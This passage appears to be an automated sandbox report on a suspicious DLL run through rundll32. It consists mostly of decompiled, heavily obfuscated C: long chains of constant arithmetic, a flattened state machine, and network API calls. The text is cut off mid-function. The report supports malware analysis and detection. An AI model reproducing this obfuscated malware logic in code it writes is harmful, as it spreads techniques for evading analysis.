                                                                                                                      • Instruction ID: a49671fc6e225b4c7f785a25eae853ca55a0aa718dac44013f98df79f78ad985
                                                                                                                      • Opcode Fuzzy Hash: 844e1a6f6fc519cc7e6a2814eb35c08057b69925ed6020bbd54e9254ca568998
                                                                                                                      • Instruction Fuzzy Hash: 9532F172508380DFE368CF65C94AA8FBBE2FBC4718F10891DE19986260D7B59949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018EE94(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v4;
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				intOrPtr _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				intOrPtr _t445;
                                                                                                                      				void* _t448;
                                                                                                                      				intOrPtr _t453;
                                                                                                                      				signed int _t467;
                                                                                                                      				intOrPtr _t470;
                                                                                                                      				intOrPtr _t471;
                                                                                                                      				void* _t505;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				signed int _t515;
                                                                                                                      				signed int _t516;
                                                                                                                      				signed int _t517;
                                                                                                                      				signed int _t518;
                                                                                                                      				signed int _t519;
                                                                                                                      				signed int _t520;
                                                                                                                      				intOrPtr* _t521;
                                                                                                                      				signed int _t524;
                                                                                                                      				intOrPtr _t529;
                                                                                                                      				signed int* _t531;
                                                                                                                      				void* _t533;
                                                                                                                      
                                                                                                                      				_t471 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_v104 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(__edx);
                                                                                                                      				_v124 = 0x410507;
                                                                                                                      				_t531 =  &(( &_v192)[4]);
                                                                                                                      				_v124 = _v124 ^ 0x83a2264d;
                                                                                                                      				_v124 = _v124 >> 0xa;
                                                                                                                      				_t470 = 0;
                                                                                                                      				_t529 = 0;
                                                                                                                      				_t512 = 0x17;
                                                                                                                      				_t524 = 0xd582a45;
                                                                                                                      				_v124 = _v124 * 3;
                                                                                                                      				_v124 = _v124 ^ 0x0062ea59;
                                                                                                                      				_v164 = 0x8ee5f4;
                                                                                                                      				_v164 = _v164 << 0xd;
                                                                                                                      				_v164 = _v164 ^ 0xc2bd4067;
                                                                                                                      				_v164 = _v164 + 0xffffa455;
                                                                                                                      				_v164 = _v164 ^ 0x1e0364bd;
                                                                                                                      				_v116 = 0xd0c3db;
                                                                                                                      				_v116 = _v116 + 0x7244;
                                                                                                                      				_v116 = _v116 + 0xffff5950;
                                                                                                                      				_v116 = _v116 * 0x7d;
                                                                                                                      				_v116 = _v116 ^ 0x65d60932;
                                                                                                                      				_v76 = 0x69c3d0;
                                                                                                                      				_v76 = _v76 + 0x2803;
                                                                                                                      				_v76 = _v76 ^ 0x0109b4af;
                                                                                                                      				_v76 = _v76 ^ 0x016cb6ed;
                                                                                                                      				_v84 = 0x591f9b;
                                                                                                                      				_v84 = _v84 ^ 0x136c22a2;
                                                                                                                      				_v84 = _v84 + 0xbc03;
                                                                                                                      				_v84 = _v84 ^ 0x133eabdb;
                                                                                                                      				_v40 = 0x32843;
                                                                                                                      				_v40 = _v40 + 0x6836;
                                                                                                                      				_v40 = _v40 ^ 0x000a5f7a;
                                                                                                                      				_v96 = 0x3c9c05;
                                                                                                                      				_v96 = _v96 * 0x1a;
                                                                                                                      				_v96 = _v96 ^ 0xb1c6e809;
                                                                                                                      				_v96 = _v96 ^ 0xb7e34fe8;
                                                                                                                      				_v56 = 0xda9312;
                                                                                                                      				_v56 = _v56 / _t512;
                                                                                                                      				_v56 = _v56 ^ 0x0000b271;
                                                                                                                      				_v132 = 0xda0ea8;
                                                                                                                      				_v132 = _v132 | 0xaeef9bf7;
                                                                                                                      				_t513 = 0x71;
                                                                                                                      				_v132 = _v132 / _t513;
                                                                                                                      				_v132 = _v132 ^ 0x01890540;
                                                                                                                      				_v44 = 0x61f218;
                                                                                                                      				_v44 = _v44 + 0xffff41d7;
                                                                                                                      				_v44 = _v44 ^ 0x006fe265;
                                                                                                                      				_v144 = 0x306d33;
                                                                                                                      				_v144 = _v144 + 0xfffff564;
                                                                                                                      				_v144 = _v144 * 0x6e;
                                                                                                                      				_v144 = _v144 + 0xffff469c;
                                                                                                                      				_v144 = _v144 ^ 0x14c9b51d;
                                                                                                                      				_v52 = 0x70de34;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x038f9e4d;
                                                                                                                      				_v36 = 0x6cb1ac;
                                                                                                                      				_v36 = _v36 + 0x1a54;
                                                                                                                      				_v36 = _v36 ^ 0x00646b3f;
                                                                                                                      				_v152 = 0x976d54;
                                                                                                                      				_v152 = _v152 ^ 0x53b4556c;
                                                                                                                      				_v152 = _v152 ^ 0x5116bac9;
                                                                                                                      				_v152 = _v152 ^ 0x4d195c93;
                                                                                                                      				_v152 = _v152 ^ 0x4f27d4c2;
                                                                                                                      				_v28 = 0x414a88;
                                                                                                                      				_v28 = _v28 | 0x717fc69d;
                                                                                                                      				_v28 = _v28 ^ 0x71799fc5;
                                                                                                                      				_v160 = 0xc7706;
                                                                                                                      				_v160 = _v160 + 0xc91f;
                                                                                                                      				_v160 = _v160 | 0xaa894ceb;
                                                                                                                      				_v160 = _v160 + 0xffffb57b;
                                                                                                                      				_v160 = _v160 ^ 0xaa88db85;
                                                                                                                      				_v168 = 0x67f23c;
                                                                                                                      				_v168 = _v168 ^ 0x8eced2dd;
                                                                                                                      				_v168 = _v168 ^ 0x27c733d3;
                                                                                                                      				_v168 = _v168 ^ 0x736125b9;
                                                                                                                      				_v168 = _v168 ^ 0xda0ef7f2;
                                                                                                                      				_v176 = 0x85bb3;
                                                                                                                      				_v176 = _v176 | 0x89ba1603;
                                                                                                                      				_v176 = _v176 >> 8;
                                                                                                                      				_t514 = 0x6a;
                                                                                                                      				_v176 = _v176 / _t514;
                                                                                                                      				_v176 = _v176 ^ 0x0009ce33;
                                                                                                                      				_v136 = 0xb0a921;
                                                                                                                      				_v136 = _v136 ^ 0x2367151f;
                                                                                                                      				_v136 = _v136 ^ 0x64865221;
                                                                                                                      				_t515 = 0x35;
                                                                                                                      				_v136 = _v136 * 0x3f;
                                                                                                                      				_v136 = _v136 ^ 0x8d2b953d;
                                                                                                                      				_v148 = 0x2df722;
                                                                                                                      				_v148 = _v148 * 0x30;
                                                                                                                      				_v148 = _v148 + 0xd30d;
                                                                                                                      				_v148 = _v148 | 0x68c8f2ae;
                                                                                                                      				_v148 = _v148 ^ 0x68db5c3d;
                                                                                                                      				_v92 = 0xa4f97a;
                                                                                                                      				_v92 = _v92 ^ 0x325a0e28;
                                                                                                                      				_v92 = _v92 + 0x57de;
                                                                                                                      				_v92 = _v92 ^ 0x32f51d21;
                                                                                                                      				_v32 = 0xa83f00;
                                                                                                                      				_v32 = _v32 + 0xffff47e2;
                                                                                                                      				_v32 = _v32 ^ 0x00a2bde7;
                                                                                                                      				_v156 = 0xe5ea35;
                                                                                                                      				_t178 =  &_v156; // 0xe5ea35
                                                                                                                      				_v156 =  *_t178 / _t515;
                                                                                                                      				_v156 = _v156 << 5;
                                                                                                                      				_v156 = _v156 + 0x3621;
                                                                                                                      				_v156 = _v156 ^ 0x008c998d;
                                                                                                                      				_v180 = 0x37bb8c;
                                                                                                                      				_v180 = _v180 ^ 0x8c6790c9;
                                                                                                                      				_t516 = 0x3c;
                                                                                                                      				_v180 = _v180 * 0x44;
                                                                                                                      				_v180 = _v180 | 0x3ef8ecb7;
                                                                                                                      				_v180 = _v180 ^ 0x7ff3e314;
                                                                                                                      				_v88 = 0x10d686;
                                                                                                                      				_v88 = _v88 + 0xffff44b6;
                                                                                                                      				_v88 = _v88 / _t516;
                                                                                                                      				_v88 = _v88 ^ 0x000573bd;
                                                                                                                      				_v64 = 0x2cf4a8;
                                                                                                                      				_v64 = _v64 << 0xb;
                                                                                                                      				_v64 = _v64 + 0xffff4c9b;
                                                                                                                      				_v64 = _v64 ^ 0x67a6f27b;
                                                                                                                      				_v188 = 0x434d7c;
                                                                                                                      				_t218 =  &_v188; // 0x434d7c
                                                                                                                      				_v188 =  *_t218 * 0x14;
                                                                                                                      				_v188 = _v188 + 0xffff53dc;
                                                                                                                      				_v188 = _v188 * 0x58;
                                                                                                                      				_v188 = _v188 ^ 0xce78d82e;
                                                                                                                      				_v48 = 0x39a498;
                                                                                                                      				_v48 = _v48 + 0xd90b;
                                                                                                                      				_v48 = _v48 ^ 0x00328937;
                                                                                                                      				_v172 = 0x329194;
                                                                                                                      				_v172 = _v172 + 0x15c2;
                                                                                                                      				_v172 = _v172 ^ 0x8846dc1f;
                                                                                                                      				_v172 = _v172 + 0x561;
                                                                                                                      				_v172 = _v172 ^ 0x8878b13b;
                                                                                                                      				_v140 = 0x921bc4;
                                                                                                                      				_v140 = _v140 | 0xc689e64a;
                                                                                                                      				_v140 = _v140 >> 0xc;
                                                                                                                      				_v140 = _v140 ^ 0x67a6be9d;
                                                                                                                      				_v140 = _v140 ^ 0x67a0761b;
                                                                                                                      				_v72 = 0xa3a418;
                                                                                                                      				_t517 = 0x26;
                                                                                                                      				_v72 = _v72 * 0x26;
                                                                                                                      				_v72 = _v72 >> 0x10;
                                                                                                                      				_v72 = _v72 ^ 0x0002c06b;
                                                                                                                      				_v108 = 0xd1ae1a;
                                                                                                                      				_v108 = _v108 ^ 0x567f87f9;
                                                                                                                      				_v108 = _v108 | 0x0eb5e220;
                                                                                                                      				_v108 = _v108 ^ 0x558f672f;
                                                                                                                      				_v108 = _v108 ^ 0x0b3c3f9a;
                                                                                                                      				_v80 = 0x5d29a8;
                                                                                                                      				_v80 = _v80 | 0x5a2f4123;
                                                                                                                      				_v80 = _v80 / _t517;
                                                                                                                      				_v80 = _v80 ^ 0x0265326d;
                                                                                                                      				_v184 = 0x50dc21;
                                                                                                                      				_v184 = _v184 + 0xffff863b;
                                                                                                                      				_v184 = _v184 + 0xffff7ebb;
                                                                                                                      				_v184 = _v184 + 0x5f54;
                                                                                                                      				_v184 = _v184 ^ 0x005a5f37;
                                                                                                                      				_v68 = 0x13fcd3;
                                                                                                                      				_v68 = _v68 + 0x7ca8;
                                                                                                                      				_v68 = _v68 >> 3;
                                                                                                                      				_v68 = _v68 ^ 0x000ac947;
                                                                                                                      				_v24 = 0xc2d10f;
                                                                                                                      				_v24 = _v24 + 0xffff657d;
                                                                                                                      				_v24 = _v24 ^ 0x00c52471;
                                                                                                                      				_v192 = 0x48c156;
                                                                                                                      				_v192 = _v192 >> 4;
                                                                                                                      				_t518 = 0x2f;
                                                                                                                      				_v192 = _v192 * 0x2f;
                                                                                                                      				_v192 = _v192 + 0xffffa98f;
                                                                                                                      				_v192 = _v192 ^ 0x00d9c1bc;
                                                                                                                      				_v112 = 0xb16c9;
                                                                                                                      				_v112 = _v112 >> 0xe;
                                                                                                                      				_v112 = _v112 << 0x10;
                                                                                                                      				_v112 = _v112 / _t518;
                                                                                                                      				_v112 = _v112 ^ 0x00028b59;
                                                                                                                      				_v120 = 0x2563ad;
                                                                                                                      				_t519 = 0x30;
                                                                                                                      				_v120 = _v120 / _t519;
                                                                                                                      				_v120 = _v120 + 0xffffe9b6;
                                                                                                                      				_v120 = _v120 >> 8;
                                                                                                                      				_v120 = _v120 ^ 0x000e86e4;
                                                                                                                      				_v60 = 0x629492;
                                                                                                                      				_t520 = 0x32;
                                                                                                                      				_v60 = _v60 / _t520;
                                                                                                                      				_v60 = _v60 << 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x07e42de9;
                                                                                                                      				_v128 = 0x197221;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 << 1;
                                                                                                                      				_v128 = _v128 * 0x2e;
                                                                                                                      				_v128 = _v128 ^ 0x0004057d;
                                                                                                                      				_t521 = _v16;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					goto L2;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t533 = _t524 - 0x94e79b7;
                                                                                                                      							if(_t533 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t533 == 0) {
                                                                                                                      								_push(_t471);
                                                                                                                      								_push(_t471);
                                                                                                                      								_t445 = E00183512(0x20000);
                                                                                                                      								_t470 = _t445;
                                                                                                                      								if(_t470 != 0) {
                                                                                                                      									_t524 = 0x4150ae2;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t524 == 0x35d4444) {
                                                                                                                      									_t453 = E00172E96(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
                                                                                                                      									_t471 = _v104;
                                                                                                                      									_t531 =  &(_t531[5]);
                                                                                                                      									_v20 = _t453;
                                                                                                                      									_t505 = 0x812254d;
                                                                                                                      									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t524 == 0x4150ae2) {
                                                                                                                      										_push(_t471);
                                                                                                                      										_push(_t471);
                                                                                                                      										_t529 = E00183512(0x2000);
                                                                                                                      										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
                                                                                                                      										goto L12;
                                                                                                                      									} else {
                                                                                                                      										if(_t524 == 0x4f6d4ac) {
                                                                                                                      											_t521 = _t521 + 0x2c;
                                                                                                                      											asm("sbb esi, esi");
                                                                                                                      											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t524 == 0x53e4020) {
                                                                                                                      												E00188CD6(_v164, _t471, _t529, _v108, _v80);
                                                                                                                      												_t531 =  &(_t531[3]);
                                                                                                                      												L11:
                                                                                                                      												_t524 = 0xd965e23;
                                                                                                                      												L12:
                                                                                                                      												L13:
                                                                                                                      												_t471 = _v104;
                                                                                                                      												goto L1;
                                                                                                                      											} else {
                                                                                                                      												if(_t524 == _t505) {
                                                                                                                      													E001795C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
                                                                                                                      													_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
                                                                                                                      													E0018E689(_v48, _v172, _v140, _v20, _v72);
                                                                                                                      													_t531 =  &(_t531[0xa]);
                                                                                                                      													L28:
                                                                                                                      													_t471 = _v104;
                                                                                                                      													_t505 = 0x812254d;
                                                                                                                      												}
                                                                                                                      												goto L29;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L30;
                                                                                                                      						}
                                                                                                                      						if(_t524 == 0x98aa4b1) {
                                                                                                                      							E001768DE(_v112, _v120, _v60, _v128, _t470);
                                                                                                                      							_t531 =  &(_t531[3]);
                                                                                                                      							_t524 = 0x34e8be;
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							if(_t524 == 0xd2f1d9f) {
                                                                                                                      								_t473 = _v44;
                                                                                                                      								_t448 = E0018E9E9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
                                                                                                                      								_t531 =  &(_t531[0x11]);
                                                                                                                      								if(_t448 == 0) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t467 = E00175AE2(_t473);
                                                                                                                      									_t524 = 0x35d4444;
                                                                                                                      									_v100 = _v16 * 0x2c + _t470;
                                                                                                                      									_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								L31:
                                                                                                                      							} else {
                                                                                                                      								if(_t524 == 0xd582a45) {
                                                                                                                      									_t524 = 0x94e79b7;
                                                                                                                      									goto L2;
                                                                                                                      								} else {
                                                                                                                      									if(_t524 != 0xd965e23) {
                                                                                                                      										goto L29;
                                                                                                                      									} else {
                                                                                                                      										E001768DE(_v184, _v68, _v24, _v192, _t529);
                                                                                                                      										_t531 =  &(_t531[3]);
                                                                                                                      										_t524 = 0x98aa4b1;
                                                                                                                      										goto L12;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						break;
                                                                                                                      						L29:
                                                                                                                      						_t445 = _v100;
                                                                                                                      					} while (_t524 != 0x34e8be);
                                                                                                                      					L30:
                                                                                                                      					return _t445;
                                                                                                                      					goto L31;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0018f564
                                                                                                                      0x0018f5e9
                                                                                                                      0x0018f5ee
                                                                                                                      0x0018f5f1
                                                                                                                      0x0018f5f1
                                                                                                                      0x0018f5f6
                                                                                                                      0x0018f5fa
                                                                                                                      0x0018f5fa
                                                                                                                      0x00000000
                                                                                                                      0x0018f566
                                                                                                                      0x0018f568
                                                                                                                      0x0018f599
                                                                                                                      0x0018f5c0
                                                                                                                      0x0018f5ca
                                                                                                                      0x0018f5cf
                                                                                                                      0x0018f7d8
                                                                                                                      0x0018f7d8
                                                                                                                      0x0018f7dc
                                                                                                                      0x0018f7dc
                                                                                                                      0x00000000
                                                                                                                      0x0018f568
                                                                                                                      0x0018f564
                                                                                                                      0x0018f557
                                                                                                                      0x0018f54b
                                                                                                                      0x0018f53f
                                                                                                                      0x00000000
                                                                                                                      0x0018f533
                                                                                                                      0x0018f6d3
                                                                                                                      0x0018f7cb
                                                                                                                      0x0018f7d0
                                                                                                                      0x0018f7d3
                                                                                                                      0x00000000
                                                                                                                      0x0018f6d9
                                                                                                                      0x0018f6df
                                                                                                                      0x0018f772
                                                                                                                      0x0018f779
                                                                                                                      0x0018f77e
                                                                                                                      0x0018f783
                                                                                                                      0x00000000
                                                                                                                      0x0018f789
                                                                                                                      0x0018f78d
                                                                                                                      0x0018f795
                                                                                                                      0x0018f7ab
                                                                                                                      0x0018f7af
                                                                                                                      0x00000000
                                                                                                                      0x0018f7af
                                                                                                                      0x00000000
                                                                                                                      0x0018f6e1
                                                                                                                      0x0018f6e7
                                                                                                                      0x0018f71e
                                                                                                                      0x00000000
                                                                                                                      0x0018f6e9
                                                                                                                      0x0018f6ef
                                                                                                                      0x00000000
                                                                                                                      0x0018f6f5
                                                                                                                      0x0018f70c
                                                                                                                      0x0018f711
                                                                                                                      0x0018f714
                                                                                                                      0x00000000
                                                                                                                      0x0018f714
                                                                                                                      0x0018f6ef
                                                                                                                      0x0018f6e7
                                                                                                                      0x0018f6df
                                                                                                                      0x00000000
                                                                                                                      0x0018f7e1
                                                                                                                      0x0018f7e1
                                                                                                                      0x0018f7e5
                                                                                                                      0x0018f7fb
                                                                                                                      0x0018f7fb
                                                                                                                      0x00000000
                                                                                                                      0x0018f7fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: a7251ec82955050c7f7e94f88e3c12564ce339474ff10d0ccbd494ff38478e04
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 3F2210719083809FE368DF25C58AA4FFBE1BBC4714F108A2DE5D996260E7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,59F9C18A), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction ID: 6a29e3ac87f5f9b0e95b07577220059068a2bdb443e3840c63f2d59567e72b14
                                                                                                                      • Opcode Fuzzy Hash: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction Fuzzy Hash: 26513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0017472E(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				char _v2084;
                                                                                                                      				char _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				char _v2616;
                                                                                                                      				intOrPtr _v2620;
                                                                                                                      				char _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _v2796;
                                                                                                                      				signed int _v2800;
                                                                                                                      				signed int _v2804;
                                                                                                                      				signed int _v2808;
                                                                                                                      				signed int _v2812;
                                                                                                                      				signed int _v2816;
                                                                                                                      				signed int _v2820;
                                                                                                                      				signed int _v2824;
                                                                                                                      				signed int _v2828;
                                                                                                                      				signed int _v2832;
                                                                                                                      				signed int _v2836;
                                                                                                                      				signed int _v2840;
                                                                                                                      				signed int _v2844;
                                                                                                                      				signed int _v2848;
                                                                                                                      				signed int _v2852;
                                                                                                                      				signed int _v2856;
                                                                                                                      				signed int _v2860;
                                                                                                                      				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				signed int _t797;
				void* _t798;
				void* _t812;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t858;
				signed int _t930;
				signed int _t931;
				void* _t936;
				signed int* _t937;
				void* _t945;

				_t937 = &_v2940;
				_v2888 = 0x58ed27;
				_v2888 = _v2888 | 0x83563905;
				_v2888 = _v2888 * 0x46;
				_t936 = __ecx;
				_t931 = 0x63d9dbc;
				_t832 = 0x70;
				_v2888 = _v2888 * 0x21;
				_v2888 = _v2888 ^ 0x6b204dc3;
				_v2700 = 0xe9de42;
				_v2700 = _v2700 >> 0xa;
				_v2700 = _v2700 ^ 0x00103a77;
				_v2936 = 0x549012;
				_v2936 = _v2936 + 0x60a5;
				_v2936 = _v2936 >> 7;
				_v2936 = _v2936 | 0x1d415c41;
				_v2936 = _v2936 ^ 0x1d4ed04e;
				_v2808 = 0xe235c3;
				_v2808 = _v2808 >> 0x10;
				_v2808 = _v2808 ^ 0xf71055a5;
				_v2808 = _v2808 ^ 0xf7181377;
				_v2788 = 0x4c3834;
				_v2788 = _v2788 >> 0xa;
				_v2788 = _v2788 + 0x8e2;
				_v2788 = _v2788 ^ 0x000a3430;
				_v2844 = 0x57ca8b;
				_v2844 = _v2844 ^ 0xd732e8d9;
				_v2844 = _v2844 << 4;
				_v2844 = _v2844 ^ 0x7657b035;
				_v2920 = 0x3116bc;
				_v2920 = _v2920 / _t832;
				_v2920 = _v2920 << 7;
				_v2920 = _v2920 | 0xbaa7d477;
				_v2920 = _v2920 ^ 0xbab318b9;
				_v2864 = 0x147254;
				_v2864 = _v2864 >> 0x10;
				_v2864 = _v2864 ^ 0xe9282c9a;
				_t833 = 0x42;
				_v2864 = _v2864 * 0x67;
				_v2864 = _v2864 ^ 0xcf208e56;
				_v2628 = 0x43de16;
				_v2628 = _v2628 / _t833;
				_v2628 = _v2628 ^ 0x00078ced;
				_v2880 = 0xe32302;
				_v2880 = _v2880 << 0xa;
				_t834 = 0x66;
				_v2880 = _v2880 / _t834;
				_v2880 = _v2880 | 0x6d622614;
				_v2880 = _v2880 ^ 0x6d625826;
				_v2904 = 0x214f4b;
				_t835 = 0x64;
